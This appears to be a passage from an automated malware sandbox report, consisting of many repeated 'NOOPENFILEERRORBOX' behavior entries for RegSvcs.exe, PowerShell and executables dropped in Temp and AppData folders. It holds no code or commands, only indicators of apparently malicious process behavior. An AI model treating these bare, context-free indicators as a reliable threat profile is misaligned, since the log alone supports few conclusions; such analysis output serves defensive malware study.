Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
